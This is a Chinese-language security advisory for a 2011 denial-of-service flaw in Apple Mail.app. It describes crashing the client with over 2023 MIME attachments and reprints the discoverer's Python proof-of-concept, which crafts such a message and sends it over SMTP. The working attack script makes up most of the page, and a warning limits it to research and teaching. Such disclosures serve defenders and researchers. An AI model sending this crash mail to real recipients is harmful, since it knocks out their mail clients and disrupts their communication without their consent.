Apple Mail.app mail拒绝服务漏洞

受影响系统:

Apple Mac OS X 10.7.2
Apple Mail 5.1

描述:


Mail.app是Apple的Mac OS X操作系统中自带的电子邮件程序。

Mail.app电子邮件客户端在实现上存在拒绝服务漏洞,通过发送大于2023 MIME的附件到邮件客户端,在解析时可造成其崩溃。

<*来源:shebang42
  
  链接:http://seclists.org/bugtraq/2011/Oct/214
*>

测试方法:


警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

shebang42 ()提供了如下测试方法:

#!/usr/bin/env python

# Mail of death for Apple’s Mail.app
#
# Tested & vulnerable:  Leopard/Intel, Snow Leopard, Lion (up to 10.7.2), IOS 4.2.x, 4.3.3
# Tested != vulnerable: Leopard/PPC
# Create mail with n_attach MIME attachments
# Version 1.0; shebang42

import smtplib

n_attach=2040 # ~2024 is sufficient
relay=’your.mta.goes.here’
mailfrom = ‘mail_of_death () example com’
mailto = mailfrom
subject = ‘PoC Apple Mail.app mail of death’
date = ‘October 29, 2011 10:00:00 GMT’


def craft_mail():
    header = ‘From: %s\nTo: %s\nSubject: %s\nDate: %s\nContent-Type: multipart/mixed ; boundary=”delim”\n\n’ % 
(mailfrom, mailto, subject, date)
    body = ‘–delim\nContent-Type: text/plain\nContent-Disposition: inline\n\nHello World\nBye Mail.app\n\n\n’
    attach = ‘–delim\nContent-Disposition: inline\n\n’*n_attach

    ### Another, slightly longer option to crash Mail.app (same bug)
    # attach = ‘–delim\nContent-Type: text/plain\nContent-Disposition: attachment; 
filename=AAAAAAAA\n\ncontent\n’*n_attach
    return header + body + attach


def send_mail(mail):
    server = smtplib.SMTP(relay)
    server.sendmail(mailfrom, mailto, mail)
    server.quit()

mail=craft_mail()
#print mail
send_mail (mail)

建议:


厂商补丁:

Apple
—–
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://support.apple.com/

发表评论?

0 条评论。

发表评论